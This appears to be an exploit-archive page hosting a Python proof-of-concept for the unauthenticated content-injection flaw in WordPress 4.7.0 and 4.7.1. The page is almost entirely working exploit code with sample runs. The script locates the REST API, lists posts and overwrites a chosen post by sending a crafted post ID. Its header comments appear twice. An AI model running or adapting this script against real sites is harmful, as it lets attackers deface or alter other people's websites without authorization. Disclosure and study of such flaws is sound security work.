exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress 4.7.0 / 4.7.1 Content Injection Proof Of Concept

WordPress 4.7.0 / 4.7.1 Content Injection Proof Of Concept
Posted Feb 2, 2017
Authored by leonjza

WordPress versions 4.7.0 and 4.7.1 unauthenticated content injection proof of concept exploit.

tags | exploit, proof of concept
SHA-256 | a85d2d596c6cdf62b7ccf464b4ae1844c836271401326bfa305b721c24235129

WordPress 4.7.0 / 4.7.1 Content Injection Proof Of Concept

Change Mirror Download
# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Date: 2017-02-02
# Exploit Author: @leonjza
# Vendor Homepage: https://wordpress.org/
# Software Link: https://wordpress.org/wordpress-4.7.zip
# Version: Wordpress 4.7.0/4.7.1
# Tested on: Debian Jessie
#
# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
#

# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

# usage example:
#
# list available posts:
#
# A>> python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# update post with content from a file
# A>> cat content
# foo
#
# A>> python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!

# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

# usage example:
#
# list available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# update post with content from a file
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!

import json
import sys
import urllib2

from lxml import etree


def get_api_url(wordpress_url):
response = urllib2.urlopen(wordpress_url)

data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]

# check if we have permalinks
if 'rest_route' in u:
print(' ! Warning, looks like permalinks are not be enabled. This might not work!')

return u


def get_posts(api_base):
respone = urllib2.urlopen(api_base + 'wp/v2/posts')
posts = json.loads(respone.read())

for post in posts:
print(' - Post ID: {}, Title: {}, Url: {}'
.format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
data = json.dumps({
'content': post_content
})

url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req).read()

print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))


def print_usage():
print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))


if __name__ == '__main__':

# ensure we have at least a url
if len(sys.argv) < 2:
print_usage()
sys.exit(1)

# if we have a post id, we need content too
if 2 < len(sys.argv) < 4:
print('Please provide a file with post content with a post id')
print_usage()
sys.exit(1)

print('* Discovering API Endpoint')
api_url = get_api_url(sys.argv[1])
print('* API lives at: {}'.format(api_url))

# if we only have a url, show the posts we have have
if len(sys.argv) < 3:
print('* Getting available posts')
get_posts(api_url)

sys.exit(0)

# if we get here, we have what we need to update a post!
print('* Updating post {}'.format(sys.argv[2]))
with open(sys.argv[3], 'r') as content:
new_content = content.readlines()

update_post(api_url, sys.argv[2], ''.join(new_content))

print('* Update complete!')

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close